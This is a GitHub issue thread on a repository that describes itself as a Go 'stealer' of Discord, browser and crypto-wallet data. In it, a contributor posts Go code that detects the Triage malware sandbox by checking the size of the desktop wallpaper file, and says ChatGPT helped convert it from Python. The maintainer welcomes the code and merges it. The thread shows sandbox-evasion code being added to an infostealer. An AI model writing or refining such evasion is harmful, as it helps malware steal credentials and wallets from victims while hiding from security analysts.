search

hackirby / skuld

Next-Gen Stealer written in Go. Stealing from Discord, Chromium-Based & Firefox-Based Browsers, Crypto Wallets and more, from every user on every disk. (PoC. For educational purposes only)
MIT License
157 stars 42 forks source link

triage detection #40

Closed mahdisbetter closed 2 months ago

mahdisbetter commented 2 months ago

i dont code in golang i just asked chatgpt to convert my python version to golang ok but you need to add this (its stupid with a 100% success rate)

package main

import (
    "bufio"
    "fmt"
    "os"
    "syscall"
    "unsafe"
)

const (
    spiGetDesktopWallpaper = 0x0073
    bufferSize             = 260
)

func detect() ([]string, error) {
    var detections []string

    var buffer [bufferSize]uint16

    ret, _, err := syscall.Syscall6(
        syscall.NewLazyDLL("user32.dll").NewProc("SystemParametersInfoW").Addr(),
        4,
        uintptr(spiGetDesktopWallpaper),
        uintptr(bufferSize),
        uintptr(unsafe.Pointer(&buffer[0])),
        0,
        0,
        0,
    )
    if ret == 0 {
        return nil, err
    }

    wallpaperPath := syscall.UTF16ToString(buffer[:])

    if _, err := os.Stat(wallpaperPath); err == nil {
        fileInfo, err := os.Stat(wallpaperPath)
        if err != nil {
            return nil, err
        }

        badWallpapers := map[int64]struct{}{
            24811: {},
        }

        if _, exists := badWallpapers[fileInfo.Size()]; exists {
            detections = append(detections, "wallpaper")
        }
    }

    return detections, nil
}

func main() {
    isTriage, err := detect()
    if err != nil {
        fmt.Println("Error:", err)
        return
    }

    fmt.Printf("detections: %s\n", fmt.Sprint(isTriage))
    bufio.NewReader(os.Stdin).ReadBytes('\n')
}
hackirby commented 2 months ago

Thank you for opening this issue and sharing the code example! Your contribution is much appreciated, and it seems like a great addition to the project.

If you're up for it, would you be willing to open a pull request with the changes? This way, we can review and merge your contribution directly, and you'll also get credit for your work.

Of course, if you'd prefer not to, just let me know—I can make the changes myself based on your suggestion.

Either way, I really appreciate your input! Let me know what works best for you.

mahdisbetter commented 2 months ago

dunno go tbh but ill try

hackirby commented 2 months ago

Hey, I just merged your PR. Even though the code wasn't fully valid, the idea behind it is great, so thanks for that!